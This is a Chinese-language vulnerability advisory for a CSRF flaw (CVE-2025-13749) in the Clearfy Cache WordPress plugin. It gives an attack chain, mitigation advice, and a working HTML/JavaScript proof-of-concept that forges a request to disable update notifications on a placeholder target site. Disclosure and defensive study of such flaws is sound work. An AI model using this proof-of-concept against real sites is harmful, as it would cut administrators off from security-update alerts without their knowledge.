CVE-2025-13749 Clearfy Cache WordPress插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13749

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Clearfy Cache WordPress plugin (Minify HTML, CSS & JS, Defer plugin for WordPress)

漏洞概述

CVE-2025-13749是WordPress插件Clearfy Cache中的一个跨站请求伪造（CSRF）漏洞。该插件是一款流行的WordPress优化和缓存管理工具，用于压缩HTML、CSS和JavaScript文件以及延迟加载资源。漏洞存在于插件的wbcr_upm_change_flag函数中，由于缺少适当的nonce验证机制，攻击者可以构造恶意请求诱骗已登录的WordPress管理员执行未授权操作。成功利用此漏洞后，攻击者能够禁用插件或主题的更新通知功能，这意味着网站将无法及时收到关键安全更新通知，从而可能使网站长期处于已知漏洞的威胁之下。攻击者通常通过社会工程学手段，如钓鱼邮件或恶意链接，诱导管理员点击来触发伪造请求。由于该漏洞不需要认证即可发起攻击，且CVSS评分为4.3（中等严重程度），对WordPress网站的安全性构成一定风险。

技术细节

漏洞根源在于Clearfy Cache插件的wbcr_upm_change_flag函数未实施CSRF令牌验证机制。在WordPress插件开发中，nonce验证是防止CSRF攻击的标准安全实践，通过生成一次性令牌并验证其有效性来确保请求来源于合法的管理界面。该漏洞允许未经身份验证的攻击者向目标WordPress站点发送POST请求，参数中包含用于更改更新通知标志的值。由于服务器端未验证请求的合法性（缺少nonce检查），攻击者可以成功修改插件的更新通知设置。攻击者通常会构造包含恶意表单的网页，当管理员访问该页面并自动提交表单时，即可在不知情的情况下禁用插件或主题的更新通知功能。此操作不会直接导致代码执行或数据泄露，但会阻断网站管理员获取安全更新的渠道，间接增加被其他漏洞攻击的风险。攻击成功的前提是目标管理员处于登录状态且主动触发伪造请求。

攻击链分析

STEP 1

1

攻击者创建包含恶意表单或自动提交脚本的网页，内容伪装为正常内容以诱骗管理员访问

STEP 2

2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导已登录的WordPress管理员访问恶意页面

STEP 3

3

管理员浏览器自动向目标站点的/wp-admin/admin-post.php发送POST请求，参数包含wbcr_upm_change_flag和禁用通知标志

STEP 4

4

目标服务器接收请求，由于wbcr_upm_change_flag函数缺少nonce验证，直接执行状态更改操作

STEP 5

5

插件的更新通知功能被禁用，管理员无法收到后续安全更新的提示通知

STEP 6

6

攻击者可利用其他已知漏洞攻击网站，而管理员因未收到更新通知而不知情

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13749 -->
<!-- This PoC demonstrates how an attacker can disable plugin/theme update notifications -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-13749 PoC</title>
</head>
<body>
    <h1>Clearfy Cache CSRF Attack PoC</h1>
    <p>Click the button below to disable update notifications (social engineering required)</p>
    
    <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrf-form">
        <input type="hidden" name="action" value="wbcr_upm_change_flag">
        <input type="hidden" name="wbcr_upm_notice" value="0">
        <input type="hidden" name="wbcr_upm_dismiss" value="1">
        <button type="submit">Submit Request</button>
    </form>
    
    <script>
        // Auto-submit form (requires user interaction or social engineering)
        // document.getElementById('csrf-form').submit();
    </script>
    
    <!-- Alternative: Fetch API approach -->
    <script>
        async function exploit() {
            const formData = new FormData();
            formData.append('action', 'wbcr_upm_change_flag');
            formData.append('wbcr_upm_notice', '0');
            formData.append('wbcr_upm_dismiss', '1');
            
            await fetch('/wp-admin/admin-post.php', {
                method: 'POST',
                body: formData,
                credentials: 'include'  // Include cookies for authenticated requests
            });
        }
        // exploit(); // Uncomment to auto-execute
    </script>
</body>
</html>

影响范围

Clearfy Cache WordPress plugin < 2.4.0

防御指南

临时缓解措施

作为临时缓解措施，网站管理员可以手动检查插件设置，确保更新通知功能未被意外禁用。同时应警惕来自不明来源的链接，避免在登录状态下访问不可信网页。建议使用WordPress安全插件（如Wordfence）监测异常的 admin-post.php 请求，并考虑启用双因素认证增强管理员账户安全。在官方补丁发布前，可临时禁用Clearfy Cache插件并使用替代的缓存优化方案。